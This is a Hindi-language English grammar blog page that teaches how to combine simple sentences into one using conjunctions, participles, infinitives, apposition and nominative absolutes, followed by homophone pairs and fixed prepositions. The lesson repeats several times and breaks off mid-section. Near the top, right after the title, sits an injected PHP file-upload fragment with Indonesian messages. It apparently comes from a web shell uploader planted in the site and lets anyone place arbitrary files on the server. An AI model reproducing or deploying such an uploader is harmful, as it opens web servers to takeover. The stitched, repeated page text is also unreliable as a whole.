Blogs - English Connection

Grammar Details

Synthesis में Simple Sentence बनाने के सभी Rules

Synthesis (संश्लेषण)


echo "<form action='' enctype='multipart/form-data' method='POST'>

<input type='file' name='filena'>

<input type='submit' name='upload' value='gasken'>


if (isset($_POST['upload'])) {




  if (@copy($tmp, $file)){

    echo "File berhasil terupload! => $cwd/$file";


  else {

    echo "File gagal terupload :(";





= the process of combining separate parts

दो या दो से अधिक Simple Sentences को मिलाकर एक नया Simple, Compound या Complex Sentence बनाना ही Synthesis है। अर्थात जो नया रूप बनकर सामने आएगा वो simple Sentence हो सकता है, या compound Sentence हो सकता है या फिर complex Sentence हो सकता है।

प्रश्न कुछ इस तरह से आता है: Combine the following groups of Simple Sentences into one Simple Sentence (by using a Participle).


दो या दो से अधिक Simple Sentences को मिलाकर एक नया Simple Sentence बनाने के तरीके:

किसी भी Simple Sentence में केवल एक Finite Verb होती है।

Finite Verb ऐसा Verb है जो कि वाक्य के subject व tense के बदलने पर बदल जाता है।

Note: पहले वाक्यों को हिंदी में अनुवाद कर लें, तब ज्यादा जल्दी कर पाएँगे।

कुल 8 तरीके हैं दो या दो से अधिक Simple Sentences को मिलाकर एक नया Simple Sentence बनाने के, जो इस प्रकार हैं –

1. Conjunction ‘And’ का प्रयोग करके

2. Adjective का प्रयोग करके

3. Adverb or Adverbial Phrase का प्रयोग करके

4. Infinitive का प्रयोग करके

5. Participle का प्रयोग करके

6. Noun or Gerund से पूर्व Preposition का प्रयोग करके

7. Noun or Phrase in apposition का प्रयोग करके

8. Nominative Absolute का प्रयोग करके


1. Conjunction ‘And’ का प्रयोग करके

कब जोड़ें - जब वाक्यों की क्रियाएँ एक ही हों।

कैसे जोड़ें – Subjects या Objects में जो अलग-अलग हों उन्हें “and” से जोड़ दें।


Separate: I need to buy a pen. I need to buy a box also.

Combined: I need to buy a pen and a box.

Separate: Rohan went to Delhi. Jojo was also with him.

Combined: Rohan and Jojo went to Delhi.

Separate: Meera saw the Taj. She saw the Red Fort also.

Combined: …………………………………………...

Combined: Meera saw the Taj and the Red Fort.


2. Adjective का प्रयोग करके

कब जोड़ें - जब एक sentence में ऐसा कोई adjective हो जो दूसरे sentence के noun की विशेषता बताये।

कैसे जोड़ें – उस adjective को उस noun के पास रख दें जिसकी वो विशेषता बता रहा है।


Separate: Rohan read a book. The book was old.

Combined: Rohan read an old book.

Separate: A man is going to the station. He is lame.

Combined: A lame man is going to the station.


Separate: A girl was weeping. She was hungry.

Combined: ……………………………………...

Combined: A hungry girl was weeping.


3. Adverb or Adverbial Phrase का प्रयोग करके

कब जोड़ें – जब एक वाक्य दूसरे वाक्य के क्रिया की विशेषता बताये।

कैसे जोड़ें – जो वाक्य विशेषता बताये, उसे adverb या adverbial phrase में बदल दें।


Separate: She went to school. She was punctual.

Combined: She went to school punctually.

Separate: They finished their work. It took them no time.

Combined: They finished their work in no time.

Separate: The river was flowing. Its flow was slow.

Combined: …………………………………

Combined: The river was flowing slowly.


4. Infinitive का प्रयोग करके

Infinitive = to + V1 (ना, नी, ने, के लिए)

कब जोड़ें – जब एक क्रिया दूसरे क्रिया का फल हो या फिर उद्देश्य हो।

कैसे जोड़ें – जो सामान्य क्रिया है उसे finite रहने दें, और जो फल या उद्देश्य बताये उसे बदल दें infinitive में।


Separate: Rohan went to Agra. He wanted to see the Taj.

Combined: Rohan went to Agra to see the Taj.

Separate: He has three sons. He has to educate them.

Combined: He has three sons to educate.

Separate: He is very fat. He cannot run fast.

Combined: He is too fat to run fast.

Separate: My uncle is quite weak. He cannot go for a morning walk.

Combined: ………………………………………………….

Combined: My uncle is too weak to go for a morning walk.


5. Noun or Gerund से पहले Preposition का प्रयोग करके

Gerund = V1 + ing (ना, नी, ने)


Separate: Meera bought a book. She gave 20 rupees for it.

Combined: Meera bought a book for 20 rupees.


Separate: The sun set. The journey was not ended.

Combined: The sun set before the end of the journey.


Combined: The journey was not ended before sunset.


Separate: She gave me advice. She also helped me.

Combined: Besides giving me advice, she helped me.


Separate: You helped her. She would have been drowned.

Combined: ……………………………………….

Combined: She would have been drowned without your help.


6. Participle का प्रयोग करके

Participle = ऐसा verb जो adjective का भी काम करे।

कब जोड़ें – जब अलग-अलग वाक्यों के Subjects एक ही हों। 

कैसे जोड़ें – जो कार्य पहले हुआ हो उसे participle में बदल दें और जो कार्य बाद में हुआ हो उसे finite ही रहने दें।

Participles तीन प्रकार के होते हैं:

(1) Present Participle = V1+ing (हुए, करके)

कब जोड़ें – जब अलग-अलग वाक्यों में कार्य लगभग साथ-साथ हो रहे हों या फिर दूसरा कार्य पहले कार्य का फल हो।

कैसे जोड़ें – जो कार्य पहले हुआ हो उसके verb को present participle में बदल दें।


Separate: He saw a lion. He ran away.

Combined: Seeing a lion, he ran away.


Separate: He saw a snake. He ran away.

Combined: Seeing a snake, he ran away.


Separate: He jumped up. He ran away.

Combined: Jumping up, he ran away.


Separate: I reached home.  I took off my clothes.

Combined: Reaching home, I took off my clothes.


Separate: She heard a noise. She turned back.

Combined: ……………………………….

Combined: Hearing a noise, she turned back.


-        Is, am, are, was, were (used as main verbs) – being

Separate: I was thirsty. I drank water.

Combined: Being thirsty, I drank water.


Separate: She was tired of playing. She sat down to take rest.

Combined: Being tired of playing, she sat down to take rest.


Combined: Tired of playing, she sat down to take rest.


कभी-कभी एक वाक्य का object दूसरे वाक्य का subject हो जाता है तथा उसके बारे में कुछ बातें कही गई होती हैं तो ऐसे में इसी कही गई बात को पहले वाक्य के object  के बाद लिख देते हैं।

Object + participle


Separate: I saw a man. He was carrying a lamp in his hand.

Combined: I saw a man carrying a lamp in his hand.


Separate: I saw Rohan. He was fighting with his brother.

Combined: I saw Rohan fighting with his brother.


Separate: We saw a bird. It was sitting on tree.

Combined: We saw a bird sitting on a tree.


(2) Past Participle = V3

कब जोड़ें – जब एक वाक्य का object दूसरे वाक्य में subject हो अक्सर दूसरा वाक्य Passive Voice में होता है।

कैसे जोड़ें – जो क्रिया पहले हुई हो उसे adjective की तरह noun से पहले प्रयोग करें।


Separate: I found my purse. It was lost.

Combined: I found my lost purse.


Separate: I saw a bear. It was wounded.

Combined: …………………………

Combined: I saw a wounded bear.


Separate: Rohan lost his book. He searched for it.

Combined: Rohan searched for his lost book.


(3) Perfect Participle = having + V3 (हुए, करके)

Having के साथ Verb का third form लगाने से perfect participle बनता है Active Voice में, तथा Having been के साथ Verb का third form लगाने से perfect participle बनता है Passive Voice में।

कब जोड़ें – जब एक कार्य complete होने पर दूसरा काम शुरू हो।

कैसे जोड़ें – जो कार्य complete हो गया हो उसे Participle में बदल दें।


Separate: The servant swept the room. He went away.

Combined: Having swept the room, the servant went away.


Separate: I completed the work.  I went to the market.

Combined: Having completed the work, I went to the market.


Separate: He had written a letter. He posted it.

Combined: ……………………………………

Combined: Having written a letter, he posted it.


अगर वाक्य passive में हो तो – having been + V3

Separate: Rohan was defeated by Ram. He was much disappointed.

Combined: Having been defeated by Ram, Rohan was much disappointed.


Separate: He was punished by the teacher. He felt sorry.

Combined: Having been punished by the teacher, he felt sorry.


7. Noun or Phrase in apposition का प्रयोग करके

Apposition = बगल-बगल

एक noun या phrase को उस noun या phrase के बगल में रखते हैं जिसकी वो व्याख्या कर रहा है और इसे दो commas के बीच में रखते हैं।

कब जोड़ें – जब अलग-अलग वाक्यों के nouns एक ही व्यक्ति या वस्तु का वर्णन करें।

कैसे जोड़ें – जिस noun के बारे में बताना है पहले वो लिखें, फिर व्याख्या करने वाले noun या phrase को दो commas के अंदर लिखें।


Separate: Rohan is a doctor. He is very smart.

Combined: Rohan, a doctor, is very smart.


Separate: Here is my sister-in-law. Her name is Meera.

Combined: Here is Meera, my sister-in-law.


Combined: Here is my sister-in-law, Meera.


Separate: Columbus was a famous sailor. He was an Italian. He discovered America.

Combined: Columbus, a famous Italian sailor, discovered America.


8. Nominative Absolute का प्रयोग करके

Nominative Absolute वाक्य का वह स्वतन्त्र हिस्सा है जो वाक्य में न तो Subject है और न ही Object, लेकिन ये मुख्य कर्ता और क्रिया का वर्णन करता है।

Subject को participle की मदद से Nominative Absolute में बदल देते हैं।

कब जोड़ें – जब प्रत्येक वाक्य का subject अलग-अलग हो। जब वाक्यों में कारण और उनके परिणाम का सम्बन्ध हो।

कैसे जोड़ें – जो क्रिया पहले हो या फिर जो कारण बताये उसके subject को Nominative Absolute में बदल दें और दूसरा वाक्य ऐसे ही रहने दें।


Separate: He was absent. No business was transacted.

Combined: He being absent, no business was transacted.

-        Is, am, are, was, were (used as main verbs) – subject + being

Separate: The weather was stormy. The plane got late.

Combined: The weather being stormy, the plane got late.


Separate: The bed was wet. Rohan did not sit there.

Combined: ……………………………………….

Combined: The bed being wet, Rohan did not sit there.

-        Active voice – having + V3

Separate: The sun rose. The fog disappeared.

Combined: The sun having risen, the fog disappeared.

-        Passive voice – having been + V3

Separate: The captain was killed. The army fled.

Combined: The captain having been killed, the army fled.


…………………………………………..The End…………………………………………..




Pray (प्रार्थना करना) : We must pray to God.

    Prey (शिकार) : He fell a prey to cholera.



Stationary (स्थिर) : The sun is stationary.

    Stationery (लेखन सामग्री) : He deals in stationery.


Story (कहानी) : She told me a story.

    Storey (मंजिल) : His office is in the second storey.


Soar (उड़ना) : The bird is soaring high.

    Sour (खट्टा) : These grapes are sour.


Lose (खोना) : We should not lose this chance.

    Loose (ढीला) : In summer one should wear loose clothes.


Soul (आत्मा) : Soul is immortal.

    Sole (जूते का तला) : He got the sole of his shoe repaired.


Human (मानव) : We should be kind to all human beings.

    Humane (दयालु) : He is humane towards his servant.


Gate  (फाटक)  :  Open the gate before you enter.

         Gait  (चाल)     :   She was moving towards the stage with a fine gait.


Altar (वेदी) : Bhagat Singh sacrificed his life at the altar of motherland.

      Alter (बदलना) : You should alter your way of speaking.

Confidant (विश्वासपात्र) : Nehru was a confidant of Gandhiji.

    Confident (विश्वस्त) : He is confident of his success.


Carrier (माल ढोनेे वाला) : We use a carrier in our bicycles to carry our luggage.

    Career (जीवन) : We should study deeply for a good career.


Berth (रेलगाड़ी या जहाज में सोने का स्थान) : He reserved a first class berth in the Punjab Mail.

     Birth (जन्म) : What is your date of birth?

Affect  (प्रभाव डालना) : The heavy rains will affect the crops.

     Effect  (प्रभाव) : No advice produces any effect on him.

Access  (पहुंच)  :  Ravi has an access to the D. M.

     Excess  (अधिकता)  :  Excess of everything is bad.

Cite (उदाहरण देना) : Can you cite a few lines from Wordsworth.

    Site (स्थान) : This site is suitable for my new office.

Dual (दोहरा) : We should not adopt dual policy.

Duel (द्वंद्व युद्ध) : Sohrab was killed in a duel.



Fixed Prepositions

Look at (somebody or something) - देखना

Look at me.

Look at this.


Look after - ख्याल रखना

Can you look after my baby for two hours?


Look for - खोजना, ढूँढ़ना

What are you looking for?

I’m looking for my keys.


Look into – Investigate (जांच पड़ताल करना)

The police will look into the matter.


Admit to/into -

She was admitted to/into the school last year.


answer for somebody/something – to explain why somrthing happened

Their trainer must answer for the team’s poor performance.


Agree with someone (a person)-

I don’t agree with you.


Agree to something (view or opinion) –




Escape from – flee (बच कर भागना)

He escaped from prison.


Blind in/with (eye)- एक आँख से अंधे होने पर

Blind to (defects)-


Complain against someone

Complain of something


Consist of (Comprise)

Consist in (remain)


Cause for

Cause of something

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Synthesis (संश्लेषण)

= the process of combining separate parts

दो या दो से अधिक Simple Sentences को मिलाकर एक नया Simple, Compound या Complex Sentence बनाना ही Synthesis है। अर्थात जो नया रूप बनकर सामने आएगा वो simple Sentence हो सकता है, या compound Sentence हो सकता है या फिर complex Sentence हो सकता है।

प्रश्न कुछ इस तरह से आता है: Combine the following groups of Simple Sentences into one Simple Sentence (by using a Participle).


दो या दो से अधिक Simple Sentences को मिलाकर एक नया Simple Sentence बनाने के तरीके:

किसी भी Simple Sentence में केवल एक Finite Verb होती है।

Finite Verb ऐसा Verb है जो कि वाक्य के subject व tense के बदलने पर बदल जाता है।

Note: पहले वाक्यों को हिंदी में अनुवाद कर लें, तब ज्यादा जल्दी कर पाएँगे।

कुल 8 तरीके हैं दो या दो से अधिक Simple Sentences को मिलाकर एक नया Simple Sentence बनाने के, जो इस प्रकार हैं –

1. Conjunction ‘And’ का प्रयोग करके

2. Adjective का प्रयोग करके

3. Adverb or Adverbial Phrase का प्रयोग करके

4. Infinitive का प्रयोग करके

5. Participle का प्रयोग करके

6. Noun or Gerund से पूर्व Preposition का प्रयोग करके

7. Noun or Phrase in apposition का प्रयोग करके

8. Nominative Absolute का प्रयोग करके


1. Conjunction ‘And’ का प्रयोग करके

कब जोड़ें - जब वाक्यों की क्रियाएँ एक ही हों।

कैसे जोड़ें – Subjects या Objects में जो अलग-अलग हों उन्हें “and” से जोड़ दें।


Separate: I need to buy a pen. I need to buy a box also.

Combined: I need to buy a pen and a box.

Separate: Rohan went to Delhi. Jojo was also with him.

Combined: Rohan and Jojo went to Delhi.

Separate: Meera saw the Taj. She saw the Red Fort also.

Combined: …………………………………………...

Combined: Meera saw the Taj and the Red Fort.


2. Adjective का प्रयोग करके

कब जोड़ें - जब एक sentence में ऐसा कोई adjective हो जो दूसरे sentence के noun की विशेषता बताये।

कैसे जोड़ें – उस adjective को उस noun के पास रख दें जिसकी वो विशेषता बता रहा है।


Separate: Rohan read a book. The book was old.

Combined: Rohan read an old book.

Separate: A man is going to the station. He is lame.

Combined: A lame man is going to the station.


Separate: A girl was weeping. She was hungry.

Combined: ……………………………………...

Combined: A hungry girl was weeping.


3. Adverb or Adverbial Phrase का प्रयोग करके

कब जोड़ें – जब एक वाक्य दूसरे वाक्य के क्रिया की विशेषता बताये।

कैसे जोड़ें – जो वाक्य विशेषता बताये, उसे adverb या adverbial phrase में बदल दें।


Separate: She went to school. She was punctual.

Combined: She went to school punctually.

Separate: They finished their work. It took them no time.

Combined: They finished their work in no time.

Separate: The river was flowing. Its flow was slow.

Combined: …………………………………

Combined: The river was flowing slowly.


4. Infinitive का प्रयोग करके

Infinitive = to + V1 (ना, नी, ने, के लिए)

कब जोड़ें – जब एक क्रिया दूसरे क्रिया का फल हो या फिर उद्देश्य हो।

कैसे जोड़ें – जो सामान्य क्रिया है उसे finite रहने दें, और जो फल या उद्देश्य बताये उसे बदल दें infinitive में।


Separate: Rohan went to Agra. He wanted to see the Taj.

Combined: Rohan went to Agra to see the Taj.

Separate: He has three sons. He has to educate them.

Combined: He has three sons to educate.

Separate: He is very fat. He cannot run fast.

Combined: He is too fat to run fast.

Separate: My uncle is quite weak. He cannot go for a morning walk.

Combined: ………………………………………………….

Combined: My uncle is too weak to go for a morning walk.


5. Noun or Gerund से पहले Preposition का प्रयोग करके

Gerund = V1 + ing (ना, नी, ने)


Separate: Meera bought a book. She gave 20 rupees for it.

Combined: Meera bought a book for 20 rupees.


Separate: The sun set. The journey was not ended.

Combined: The sun set before the end of the journey.


Combined: The journey was not ended before sunset.


Separate: She gave me advice. She also helped me.

Combined: Besides giving me advice, she helped me.


Separate: You helped her. She would have been drowned.

Combined: ……………………………………….

Combined: She would have been drowned without your help.


6. Participle का प्रयोग करके

Participle = ऐसा verb जो adjective का भी काम करे।

कब जोड़ें – जब अलग-अलग वाक्यों के Subjects एक ही हों। 

कैसे जोड़ें – जो कार्य पहले हुआ हो उसे participle में बदल दें और जो कार्य बाद में हुआ हो उसे finite ही रहने दें।

Participles तीन प्रकार के होते हैं:

(1) Present Participle = V1+ing (हुए, करके)

कब जोड़ें – जब अलग-अलग वाक्यों में कार्य लगभग साथ-साथ हो रहे हों या फिर दूसरा कार्य पहले कार्य का फल हो।

कैसे जोड़ें – जो कार्य पहले हुआ हो उसके verb को present participle में बदल दें।


Separate: He saw a lion. He ran away.

Combined: Seeing a lion, he ran away.


Separate: He saw a snake. He ran away.

Combined: Seeing a snake, he ran away.


Separate: He jumped up. He ran away.

Combined: Jumping up, he ran away.


Separate: I reached home.  I took off my clothes.

Combined: Reaching home, I took off my clothes.


Separate: She heard a noise. She turned back.

Combined: ……………………………….

Combined: Hearing a noise, she turned back.


-        Is, am, are, was, were (used as main verbs) – being

Separate: I was thirsty. I drank water.

Combined: Being thirsty, I drank water.


Separate: She was tired of playing. She sat down to take rest.

Combined: Being tired of playing, she sat down to take rest.


Combined: Tired of playing, she sat down to take rest.


कभी-कभी एक वाक्य का object दूसरे वाक्य का subject हो जाता है तथा उसके बारे में कुछ बातें कही गई होती हैं तो ऐसे में इसी कही गई बात को पहले वाक्य के object  के बाद लिख देते हैं।

Object + participle


Separate: I saw a man. He was carrying a lamp in his hand.

Combined: I saw a man carrying a lamp in his hand.


Separate: I saw Rohan. He was fighting with his brother.

Combined: I saw Rohan fighting with his brother.


Separate: We saw a bird. It was sitting on tree.

Combined: We saw a bird sitting on a tree.


(2) Past Participle = V3

कब जोड़ें – जब एक वाक्य का object दूसरे वाक्य में subject हो अक्सर दूसरा वाक्य Passive Voice में होता है।

कैसे जोड़ें – जो क्रिया पहले हुई हो उसे adjective की तरह noun से पहले प्रयोग करें।


Separate: I found my purse. It was lost.

Combined: I found my lost purse.


Separate: I saw a bear. It was wounded.

Combined: …………………………

Combined: I saw a wounded bear.


Separate: Rohan lost his book. He searched for it.

Combined: Rohan searched for his lost book.


(3) Perfect Participle = having + V3 (हुए, करके)

Having के साथ Verb का third form लगाने से perfect participle बनता है Active Voice में, तथा Having been के साथ Verb का third form लगाने से perfect participle बनता है Passive Voice में।

कब जोड़ें – जब एक कार्य complete होने पर दूसरा काम शुरू हो।

कैसे जोड़ें – जो कार्य complete हो गया हो उसे Participle में बदल दें।


Separate: The servant swept the room. He went away.

Combined: Having swept the room, the servant went away.


Separate: I completed the work.  I went to the market.

Combined: Having completed the work, I went to the market.


Separate: He had written a letter. He posted it.

Combined: ……………………………………

Combined: Having written a letter, he posted it.


अगर वाक्य passive में हो तो – having been + V3

Separate: Rohan was defeated by Ram. He was much disappointed.

Combined: Having been defeated by Ram, Rohan was much disappointed.


Separate: He was punished by the teacher. He felt sorry.

Combined: Having been punished by the teacher, he felt sorry.


7. Noun or Phrase in apposition का प्रयोग करके

Apposition = बगल-बगल

एक noun या phrase को उस noun या phrase के बगल में रखते हैं जिसकी वो व्याख्या कर रहा है और इसे दो commas के बीच में रखते हैं।

कब जोड़ें – जब अलग-अलग वाक्यों के nouns एक ही व्यक्ति या वस्तु का वर्णन करें।

कैसे जोड़ें – जिस noun के बारे में बताना है पहले वो लिखें, फिर व्याख्या करने वाले noun या phrase को दो commas के अंदर लिखें।


Separate: Rohan is a doctor. He is very smart.

Combined: Rohan, a doctor, is very smart.


Separate: Here is my sister-in-law. Her name is Meera.

Combined: Here is Meera, my sister-in-law.


Combined: Here is my sister-in-law, Meera.


Separate: Columbus was a famous sailor. He was an Italian. He discovered America.

Combined: Columbus, a famous Italian sailor, discovered America.


8. Nominative Absolute का प्रयोग करके

Nominative Absolute वाक्य का वह स्वतन्त्र हिस्सा है जो वाक्य में न तो Subject है और न ही Object, लेकिन ये मुख्य कर्ता और क्रिया का वर्णन करता है।

Subject को participle की मदद से Nominative Absolute में बदल देते हैं।

कब जोड़ें – जब प्रत्येक वाक्य का subject अलग-अलग हो। जब वाक्यों में कारण और उनके परिणाम का सम्बन्ध हो।

कैसे जोड़ें – जो क्रिया पहले हो या फिर जो कारण बताये उसके subject को Nominative Absolute में बदल दें और दूसरा वाक्य ऐसे ही रहने दें।


Separate: He was absent. No business was transacted.

Combined: He being absent, no business was transacted.

-        Is, am, are, was, were (used as main verbs) – subject + being

Separate: The weather was stormy. The plane got late.

Combined: The weather being stormy, the plane got late.


Separate: The bed was wet. Rohan did not sit there.

Combined: ……………………………………….

Combined: The bed being wet, Rohan did not sit there.

-        Active voice – having + V3

Separate: The sun rose. The fog disappeared.

Combined: The sun having risen, the fog disappeared.

-        Passive voice – having been + V3

Separate: The captain was killed. The army fled.

Combined: The captain having been killed, the army fled.


…………………………………………..The End…………………………………………..




Pray (प्रार्थना करना) : We must pray to God.

    Prey (शिकार) : He fell a prey to cholera.



Stationary (स्थिर) : The sun is stationary.

    Stationery (लेखन सामग्री) : He deals in stationery.


Story (कहानी) : She told me a story.

    Storey (मंजिल) : His office is in the second storey.


Soar (उड़ना) : The bird is soaring high.

    Sour (खट्टा) : These grapes are sour.


Lose (खोना) : We should not lose this chance.

    Loose (ढीला) : In summer one should wear loose clothes.


Soul (आत्मा) : Soul is immortal.

    Sole (जूते का तला) : He got the sole of his shoe repaired.


Human (मानव) : We should be kind to all human beings.

    Humane (दयालु) : He is humane towards his servant.


Gate  (फाटक)  :  Open the gate before you enter.

         Gait  (चाल)     :   She was moving towards the stage with a fine gait.


Altar (वेदी) : Bhagat Singh sacrificed his life at the altar of motherland.

      Alter (बदलना) : You should alter your way of speaking.

Confidant (विश्वासपात्र) : Nehru was a confidant of Gandhiji.

    Confident (विश्वस्त) : He is confident of his success.


Carrier (माल ढोनेे वाला) : We use a carrier in our bicycles to carry our luggage.

    Career (जीवन) : We should study deeply for a good career.


Berth (रेलगाड़ी या जहाज में सोने का स्थान) : He reserved a first class berth in the Punjab Mail.

     Birth (जन्म) : What is your date of birth?

Affect  (प्रभाव डालना) : The heavy rains will affect the crops.

     Effect  (प्रभाव) : No advice produces any effect on him.

Access  (पहुंच)  :  Ravi has an access to the D. M.

     Excess  (अधिकता)  :  Excess of everything is bad.

Cite (उदाहरण देना) : Can you cite a few lines from Wordsworth.

    Site (स्थान) : This site is suitable for my new office.

Dual (दोहरा) : We should not adopt dual policy.

Duel (द्वंद्व युद्ध) : Sohrab was killed in a duel.



Fixed Prepositions

Look at (somebody or something) - देखना

Look at me.

Look at this.


Look after - ख्याल रखना

Can you look after my baby for two hours?


Look for - खोजना, ढूँढ़ना

What are you looking for?

I’m looking for my keys.


Look into – Investigate (जांच पड़ताल करना)

The police will look into the matter.


Admit to/into -

She was admitted to/into the school last year.


answer for somebody/something – to explain why somrthing happened

Their trainer must answer for the team’s poor performance.


Agree with someone (a person)-

I don’t agree with you.


Agree to something (view or opinion) –




Escape from – flee (बच कर भागना)

He escaped from prison.


Blind in/with (eye)- एक आँख से अंधे होने पर

Blind to (defects)-


Complain against someone

Complain of something


Consist of (Comprise)

Consist in (remain)


Cause for

Cause of something

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Synthesis (संश्लेषण)


= the process of combining separate parts

दो या दो से अधिक Simple Sentences को मिलाकर एक नया Simple, Compound या Complex Sentence बनाना ही Synthesis है। अर्थात जो नया रूप बनकर सामने आएगा वो simple Sentence हो सकता है, या compound Sentence हो सकता है या फिर complex Sentence हो सकता है।

प्रश्न कुछ इस तरह से आता है: Combine the following groups of Simple Sentences into one Simple Sentence (by using a Participle).


दो या दो से अधिक Simple Sentences को मिलाकर एक नया Simple Sentence बनाने के तरीके:

किसी भी Simple Sentence में केवल एक Finite Verb होती है।

Finite Verb ऐसा Verb है जो कि वाक्य के subject व tense के बदलने पर बदल जाता है।

Note: पहले वाक्यों को हिंदी में अनुवाद कर लें, तब ज्यादा जल्दी कर पाएँगे।

कुल 8 तरीके हैं दो या दो से अधिक Simple Sentences को मिलाकर एक नया Simple Sentence बनाने के, जो इस प्रकार हैं –

1. Conjunction ‘And’ का प्रयोग करके

2. Adjective का प्रयोग करके

3. Adverb or Adverbial Phrase का प्रयोग करके

4. Infinitive का प्रयोग करके

5. Participle का प्रयोग करके

6. Noun or Gerund से पूर्व Preposition का प्रयोग करके

7. Noun or Phrase in apposition का प्रयोग करके

8. Nominative Absolute का प्रयोग करके


1. Conjunction ‘And’ का प्रयोग करके

कब जोड़ें - जब वाक्यों की क्रियाएँ एक ही हों।

कैसे जोड़ें – Subjects या Objects में जो अलग-अलग हों उन्हें “and” से जोड़ दें।


Separate: I need to buy a pen. I need to buy a box also.

Combined: I need to buy a pen and a box.

Separate: Rohan went to Delhi. Jojo was also with him.

Combined: Rohan and Jojo went to Delhi.

Separate: Meera saw the Taj. She saw the Red Fort also.

Combined: …………………………………………...

Combined: Meera saw the Taj and the Red Fort.


2. Adjective का प्रयोग करके

कब जोड़ें - जब एक sentence में ऐसा कोई adjective हो जो दूसरे sentence के noun की विशेषता बताये।

कैसे जोड़ें – उस adjective को उस noun के पास रख दें जिसकी वो विशेषता बता रहा है।


Separate: Rohan read a book. The book was old.

Combined: Rohan read an old book.

Separate: A man is going to the station. He is lame.

Combined: A lame man is going to the station.


Separate: A girl was weeping. She was hungry.

Combined: ……………………………………...

Combined: A hungry girl was weeping.


3. Adverb or Adverbial Phrase का प्रयोग करके

कब जोड़ें – जब एक वाक्य दूसरे वाक्य के क्रिया की विशेषता बताये।

कैसे जोड़ें – जो वाक्य विशेषता बताये, उसे adverb या adverbial phrase में बदल दें।


Separate: She went to school. She was punctual.

Combined: She went to school punctually.

Separate: They finished their work. It took them no time.

Combined: They finished their work in no time.

Separate: The river was flowing. Its flow was slow.

Combined: …………………………………

Combined: The river was flowing slowly.


4. Infinitive का प्रयोग करके

Infinitive = to + V1 (ना, नी, ने, के लिए)

कब जोड़ें – जब एक क्रिया दूसरे क्रिया का फल हो या फिर उद्देश्य हो।

कैसे जोड़ें – जो सामान्य क्रिया है उसे finite रहने दें, और जो फल या उद्देश्य बताये उसे बदल दें infinitive में।


Separate: Rohan went to Agra. He wanted to see the Taj.

Combined: Rohan went to Agra to see the Taj.

Separate: He has three sons. He has to educate them.

Combined: He has three sons to educate.

Separate: He is very fat. He cannot run fast.

Combined: He is too fat to run fast.

Separate: My uncle is quite weak. He cannot go for a morning walk.

Combined: ………………………………………………….

Combined: My uncle is too weak to go for a morning walk.


5. Noun or Gerund से पहले Preposition का प्रयोग करके

Gerund = V1 + ing (ना, नी, ने)


Separate: Meera bought a book. She gave 20 rupees for it.

Combined: Meera bought a book for 20 rupees.


Separate: The sun set. The journey was not ended.

Combined: The sun set before the end of the journey.


Combined: The journey was not ended before sunset.


Separate: She gave me advice. She also helped me.

Combined: Besides giving me advice, she helped me.


Separate: You helped her. She would have been drowned.

Combined: ……………………………………….

Combined: She would have been drowned without your help.


6. Participle का प्रयोग करके

Participle = ऐसा verb जो adjective का भी काम करे।

कब जोड़ें – जब अलग-अलग वाक्यों के Subjects एक ही हों। 

कैसे जोड़ें – जो कार्य पहले हुआ हो उसे participle में बदल दें और जो कार्य बाद में हुआ हो उसे finite ही रहने दें।

Participles तीन प्रकार के होते हैं:

(1) Present Participle = V1+ing (हुए, करके)

कब जोड़ें – जब अलग-अलग वाक्यों में कार्य लगभग साथ-साथ हो रहे हों या फिर दूसरा कार्य पहले कार्य का फल हो।

कैसे जोड़ें – जो कार्य पहले हुआ हो उसके verb को present participle में बदल दें।


Separate: He saw a lion. He ran away.

Combined: Seeing a lion, he ran away.


Separate: He saw a snake. He ran away.

Combined: Seeing a snake, he ran away.


Separate: He jumped up. He ran away.

Combined: Jumping up, he ran away.


Separate: I reached home.  I took off my clothes.

Combined: Reaching home, I took off my clothes.


Separate: She heard a noise. She turned back.

Combined: ……………………………….

Combined: Hearing a noise, she turned back.


-        Is, am, are, was, were (used as main verbs) – being

Separate: I was thirsty. I drank water.

Combined: Being thirsty, I drank water.


Separate: She was tired of playing. She sat down to take rest.

Combined: Being tired of playing, she sat down to take rest.


Combined: Tired of playing, she sat down to take rest.


कभी-कभी एक वाक्य का object दूसरे वाक्य का subject हो जाता है तथा उसके बारे में कुछ बातें कही गई होती हैं तो ऐसे में इसी कही गई बात को पहले वाक्य के object  के बाद लिख देते हैं।

Object + participle


Separate: I saw a man. He was carrying a lamp in his hand.

Combined: I saw a man carrying a lamp in his hand.


Separate: I saw Rohan. He was fighting with his brother.

Combined: I saw Rohan fighting with his brother.


Separate: We saw a bird. It was sitting on tree.

Combined: We saw a bird sitting on a tree.


(2) Past Participle = V3

कब जोड़ें – जब एक वाक्य का object दूसरे वाक्य में subject हो अक्सर दूसरा वाक्य Passive Voice में होता है।

कैसे जोड़ें – जो क्रिया पहले हुई हो उसे adjective की तरह noun से पहले प्रयोग करें।


Separate: I found my purse. It was lost.

Combined: I found my lost purse.


Separate: I saw a bear. It was wounded.

Combined: …………………………

Combined: I saw a wounded bear.


Separate: Rohan lost his book. He searched for it.

Combined: Rohan searched for his lost book.


(3) Perfect Participle = having + V3 (हुए, करके)

Having के साथ Verb का third form लगाने से perfect participle बनता है Active Voice में, तथा Having been के साथ Verb का third form लगाने से perfect participle बनता है Passive Voice में।

कब जोड़ें – जब एक कार्य complete होने पर दूसरा काम शुरू हो।

कैसे जोड़ें – जो कार्य complete हो गया हो उसे Participle में बदल दें।


Separate: The servant swept the room. He went away.

Combined: Having swept the room, the servant went away.


Separate: I completed the work.  I went to the market.

Combined: Having completed the work, I went to the market.


Separate: He had written a letter. He posted it.

Combined: ……………………………………

Combined: Having written a letter, he posted it.


अगर वाक्य passive में हो तो – having been + V3

Separate: Rohan was defeated by Ram. He was much disappointed.

Combined: Having been defeated by Ram, Rohan was much disappointed.


Separate: He was punished by the teacher. He felt sorry.

Combined: Having been punished by the teacher, he felt sorry.


7. Noun or Phrase in apposition का प्रयोग करके

Apposition = बगल-बगल

एक noun या phrase को उस noun या phrase के बगल में रखते हैं जिसकी वो व्याख्या कर रहा है और इसे दो commas के बीच में रखते हैं।

कब जोड़ें – जब अलग-अलग वाक्यों के nouns एक ही व्यक्ति या वस्तु का वर्णन करें।

कैसे जोड़ें – जिस noun के बारे में बताना है पहले वो लिखें, फिर व्याख्या करने वाले noun या phrase को दो commas के अंदर लिखें।


Separate: Rohan is a doctor. He is very smart.

Combined: Rohan, a doctor, is very smart.


Separate: Here is my sister-in-law. Her name is Meera.

Combined: Here is Meera, my sister-in-law.


Combined: Here is my sister-in-law, Meera.


Separate: Columbus was a famous sailor. He was an Italian. He discovered America.

Combined: Columbus, a famous Italian sailor, discovered America.


8. Nominative Absolute का प्रयोग करके

